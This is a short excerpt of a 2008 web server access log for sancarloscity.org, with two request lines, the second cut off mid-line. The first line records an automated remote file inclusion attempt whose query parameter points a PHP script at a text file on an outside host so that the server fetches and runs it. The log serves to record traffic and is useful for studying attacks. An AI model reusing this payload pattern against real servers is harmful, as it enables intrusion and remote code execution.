66.40.52.30 - - [30/Oct/2008:06:41:22 -0700] "GET /logs/?sourcedir=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 200 71305 "-" "libwww-perl/5.800" "www.sancarloscity.org"
200.76.250.44 - - [30/Oct/2008:06:41:22 -0700] "GET /jodera2/viewforum.php?f=1&sid=8f6105c995dae039cc6605013b5b3538 HTTP/1.1" 200 84847 "http://www.sancarloscity.org/viewforum.php?f=1&sid=8f6105c995dae039cc6605013b5b3538" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv